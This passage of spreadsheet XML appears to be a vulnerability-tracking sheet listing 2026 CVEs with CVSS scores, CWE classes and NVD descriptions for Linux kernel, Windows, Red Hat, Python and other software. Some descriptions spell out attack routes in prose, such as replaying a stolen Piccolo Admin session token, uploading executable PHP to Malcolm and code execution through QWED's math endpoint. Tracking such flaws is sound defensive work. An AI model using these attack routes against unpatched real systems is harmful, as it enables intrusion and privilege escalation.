          <t>HIGH</t>
        </is>
      </c>
      <c r="E259" s="5" t="inlineStr"/>
      <c r="F259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G259" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H259" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I259" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-667</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: l2cap: Add missing chan lock in l2cap_ecred_reconf_rsp
l2cap_ecred_reconf_rsp() calls l2cap_chan_del() without holding
l2cap_chan_lock(). Every other l2cap_chan_del() caller in the file
acquires the lock first. A remote BLE device can send a crafted
L2CAP ECRED reconfiguration response to corrupt the channel list
while another thread is iterating it.
Add l2cap_chan_hold() and l2cap_chan_lock() before l2cap_chan_del(),
and l2cap_chan_unlock() and l2cap_chan_put() after, matching the
pattern used in l2cap_ecred_conn_rsp() and l2cap_conn_del().</t>
        </is>
      </c>
      <c r="M259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53071</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53277</t>
        </is>
      </c>
      <c r="C260" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E260" s="5" t="inlineStr"/>
      <c r="F260" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G260" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H260" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I260" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>CWE-662, CWE-820</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Take the SRCU lock for page table walks in fault injection and AT emulation
walk_s1() and kvm_walk_nested_s2() expect to be called while holding
kvm-&gt;srcu to guard against memslot changes. While this is generally
the case, __kvm_at_s12() and __kvm_find_s1_desc_level() call into the
respective walkers without taking kvm-&gt;srcu.
Fix by acquiring kvm-&gt;srcu prior to the table walk in both instances.</t>
        </is>
      </c>
      <c r="M260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53277</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53322</t>
        </is>
      </c>
      <c r="C261" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E261" s="5" t="inlineStr"/>
      <c r="F261" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G261" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H261" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I261" s="5" t="inlineStr">
        <is>
          <t>2026-06-26</t>
        </is>
      </c>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-826</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: Clean up DMABUFs before disabling function
On device shutdown, make vfio_pci_core_close_device() call
vfio_pci_dma_buf_cleanup() before the function is disabled via
vfio_pci_core_disable().  This ensures that all access via DMABUFs is
revoked before the function's BARs become inaccessible.
This fixes an issue where, if the function is disabled first, a tiny
window exists in which the function's MSE is cleared and yet BARs
could still be accessed via the DMABUF.  The resources would also be
freed and up for grabs by a different driver.</t>
        </is>
      </c>
      <c r="M261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53322</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54099</t>
        </is>
      </c>
      <c r="C262" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E262" s="5" t="inlineStr"/>
      <c r="F262" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G262" s="5" t="inlineStr">
        <is>
          <t>windows, red hat</t>
        </is>
      </c>
      <c r="H262" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:windows_machine_config_operator</t>
        </is>
      </c>
      <c r="I262" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Windows Machine Config Operator (WMCO) for Red Hat OpenShift Container Platform. The WICD CSR auto-approver validates that a Certificate Signing Request contains the organization system:wicd-nodes but does not reject additional organization values such as system:masters. A compromised Windows worker node that holds WICD credentials can submit a CSR that is auto-approved and signed by the cluster, yielding a client certificate that grants cluster-administrator privileges and enabling full cluster takeover.</t>
        </is>
      </c>
      <c r="M262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54099</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55485</t>
        </is>
      </c>
      <c r="C263" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E263" s="5" t="inlineStr"/>
      <c r="F263" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G263" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr">
        <is>
          <t>Piccolo Admin is an admin interface and content management system for Python, built on top of Piccolo. Prior to 1.14.0, piccolo_admin/endpoints.py uses superuser_validators to block PUT, PATCH, DELETE, and POST requests by non-superusers but permits GET requests to configured user and session tables, while piccolo_api/session_auth/tables.py exposes SessionsBase.token because the token column is not secret. In deployments that add the Sessions and User tables to create_admin, a non-superuser administrator can call GET /api/tables/sessions/, obtain another user's live session token, replay it as the Cookie id value to impersonate a superuser, and permanently set superuser to true on the attacker's own row. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="M263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55485</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55509</t>
        </is>
      </c>
      <c r="C264" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E264" s="5" t="inlineStr"/>
      <c r="F264" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G264" s="5" t="inlineStr">
        <is>
          <t>oracle, mysql</t>
        </is>
      </c>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. Prior to 4.3.5, the sample MySQLBrowserProvider in wsgidav/samples/mysql_dav_provider.py concatenates the record key parsed from a request URL directly into SQL WHERE clauses. The affected _exists_record_by_primary_key, _get_field_by_primary_key, and _get_record_by_primary_key methods are part of a shipped example provider that is not enabled by default. An attacker who can access a share explicitly configured with this non-default provider can inject SQL through a normal GET request; anonymously exposed read shares permit a status-code oracle and extraction of arbitrary data reachable by the configured MySQL account. This issue is fixed in version 4.3.5.</t>
        </is>
      </c>
      <c r="M264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55509</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55521</t>
        </is>
      </c>
      <c r="C265" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E265" s="5" t="inlineStr"/>
      <c r="F265" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G265" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L265" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits authorization checks in IndexesApi.listPacketIndex, IndexesApi.listEventIndex, Cop1Api.disable, Cop1Api.resume, Cop1Api.initialize, Cop1Api.updateConfig, and TimeApi.setTime. An authenticated low-privilege user can read packet and event index metadata without ObjectPrivilegeType.ReadPacket, alter COP-1 link state without SystemPrivilege.ControlLinks, and manipulate simulation time. These operations can disclose telemetry metadata, disrupt telecommand handling, and affect system integrity and availability. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55521</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55585</t>
        </is>
      </c>
      <c r="C266" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E266" s="5" t="inlineStr"/>
      <c r="F266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G266" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L266" s="5" t="inlineStr">
        <is>
          <t>QWED is open-source AI verification infrastructure for deterministic verification of LLM outputs, tool calls, code, schemas, and agent state before production execution. Prior to 5.1.2, the qwed package passes caller-controlled math expressions directly to SymPy parse_expr() without restricted global_dict and local_dict namespaces, allowing Python eval() to resolve builtins and execute arbitrary Python code in the API server process. In src/qwed_new/api/main.py, POST /verify/math is protected by get_current_tenant but accepts any valid tenant API key, reads the expression field, applies only a cosmetic re.sub(r'(\d)(()', r'\1*\2', expression) normalization, and passes the result to parse_expr(). In src/qwed_new/core/batch.py, POST /verify/batch sends math items through batch_service.create_job(), stores item.query verbatim, and _verify_item() passes VerificationType.MATH input to parse_expr() without sanitization. The default-enabled POST /auth/signup endpoint allows anyone to create a standard tenant account, POST /auth/api-keys issues an x-api-key, and either vulnerable path can then be used to read or write files, modify data, execute operating system commands, terminate the service, and compromise other tenants in a shared deployment. This issue is fixed in version 5.1.2.</t>
        </is>
      </c>
      <c r="M266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55585</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55676</t>
        </is>
      </c>
      <c r="C267" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E267" s="5" t="inlineStr"/>
      <c r="F267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G267" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L267" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. The file-upload component (FilePond PHP backend) accepts uploads at `POST /server/php/submit.php` and stores them in a directory served by the same nginx and php-fpm instance. The allow-list that should restrict accepted file types is an empty array by default (`file-upload/php/config.php:16`), so the type check is a no-op and every extension is accepted. The filename sanitizer keeps the `.php` extension intact. Committed files land in `/var/www/upload/server/php/files` (`file-upload/php/config.php:7`), and the component's nginx routes any URL ending in `.php` to php-fpm. An authenticated `GET /server/php/files/&lt;name&gt;.php` then executes the uploaded code as `www-data`. Prior to version 26.06.1, in RBAC mode, the upload endpoint is reachable by the granular `ROLE_UPLOAD` role (`nginx/lua/nginx_auth_helpers.lua:71`), a role intended only for submitting capture files. As a result, a user holding the upload-only role runs arbitrary PHP as `www-data` inside the file-upload container. Version 26.06.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55676</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57163</t>
        </is>
      </c>
      <c r="C268" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E268" s="5" t="inlineStr"/>
      <c r="F268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G268" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L268" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit c4a151a, a stack buffer overflow exists in the GnuTLS TLS backend when parsing the Subject Alternative Name extension of a peer certificate (tls_cert_get_info() in ssl_sock_gtls.c). Only GnuTLS builds are affected (--with-gnutls); OpenSSL and Apple SecureTransport/Network.framework builds are not affected. While extracting certificate information after a TLS handshake, an incorrect buffer-size value can cause an oversized SubjectAltName entry to be written past the end of a fixed-size stack buffer. A network-positioned attacker presenting a crafted certificate — a malicious server to a connecting client, or a malicious client to a server that requests certificates — can trigger this during the TLS handshake, before any SIP-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. This issue has been patched via commit c4a151a.</t>
        </is>
      </c>
      <c r="M268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57163</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57866</t>
        </is>
      </c>
      <c r="C269" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E269" s="5" t="inlineStr"/>
      <c r="F269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G269" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H269" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I269" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L269" s="5" t="inlineStr">
        <is>
          <t>Server side request forgery in Apache Impala versions 4.4.x and 4.5.x.  Authenticated Impala users with permissions to execute the ai_generate_text() function can exfiltrate secrets provided by the credential providers configured in the `hadoop.security.credential.provider.path` property of `core-site.xml`. The secret's key must be known to the user.</t>
        </is>
      </c>
      <c r="M269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57866</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62316</t>
        </is>
      </c>
      <c r="C270" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E270" s="5" t="inlineStr"/>
      <c r="F270" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G270" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr">
        <is>
          <t>Microsoft UFO open-source framework for intelligent automation across devices and platforms. Prior to 3.0.8, ufo/client/mcp/http_servers/linux_mcp_server.py binds a FastMCP streamable HTTP server to localhost:8010 but does not validate the Host, Origin, or Sec-Fetch-Site headers. An attacker-controlled web page can use DNS rebinding to reach the local /mcp endpoint, enumerate tool schemas through tools/list, and invoke execute_command with a valid UFO_MCP_API_KEY to read files or execute allowed operating system commands as the victim's user. This issue is fixed in version 3.0.8.</t>
        </is>
      </c>
      <c r="M270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62316</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="C271" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E271" s="5" t="inlineStr"/>
      <c r="F271" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G271" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62744</t>
        </is>
      </c>
      <c r="C272" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E272" s="5" t="inlineStr"/>
      <c r="F272" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G272" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62895</t>
        </is>
      </c>
      <c r="C273" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E273" s="5" t="inlineStr"/>
      <c r="F273" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G273" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-89, CWE-942</t>
        </is>
      </c>
      <c r="L273" s="5" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64364</t>
        </is>
      </c>
      <c r="C274" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E274" s="5" t="inlineStr"/>
      <c r="F274" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G274" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H274" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I274" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L274" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: multitouch: fix out-of-bounds bit access on mt_io_flags
mt_io_flags is a single unsigned long, but mt_process_slot(),
mt_release_pending_palms() and mt_release_contacts() use it as a
per-slot bitmap indexed by the slot number. That slot number is only
bounded by td-&gt;maxcontacts, which is taken from the device's
ContactCountMaximum feature report and can be up to 255, not by
BITS_PER_LONG.
As a result, a multitouch device that advertises a large contact count
makes set_bit()/clear_bit() operate past the mt_io_flags word and
corrupt the adjacent members of struct mt_device. The sticky-fingers
release timer is the easiest way to reach this. mt_release_contacts()
runs
	for (i = 0; i &lt; mt-&gt;num_slots; i++)
		clear_bit(i, &amp;td-&gt;mt_io_flags);
with num_slots == maxcontacts. For maxcontacts around 250 the loop
clears the bits that overlap td-&gt;applications.next, zeroing that list
head, and the list_for_each_entry() that immediately follows then
dereferences NULL. The kernel panics from timer (softirq) context. On a
KASAN build this shows up as a general protection fault in
mt_release_contacts() with a null-ptr-deref at offset 0x58, which is
offsetof(struct mt_application, num_received).
The state is reachable from an untrusted USB or Bluetooth HID
multitouch device; no local privileges are required.
Store the per-slot active state in a separately allocated bitmap sized
for maxcontacts, the same pattern already used for pending_palm_slots,
and keep only MT_IO_FLAGS_RUNNING in mt_io_flags. The two
"mt_io_flags &amp; MT_IO_SLOTS_MASK" arming checks become
bitmap_empty(td-&gt;active_slots, td-&gt;maxcontacts).
Move MT_IO_FLAGS_RUNNING back to bit 0. It was bumped to bit 32 by the
same commit to leave the low byte for the slot bits; with the slot bits
gone it fits in bit 0 again, which also keeps it within the unsigned
long on 32-bit.</t>
        </is>
      </c>
      <c r="M274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64364</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65772</t>
        </is>
      </c>
      <c r="C275" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E275" s="5" t="inlineStr"/>
      <c r="F275" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G275" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="C276" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E276" s="5" t="inlineStr"/>
      <c r="F276" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G276" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="C277" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E277" s="5" t="inlineStr"/>
      <c r="F277" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G277" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H277" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I277" s="5" t="inlineStr">
        <is>
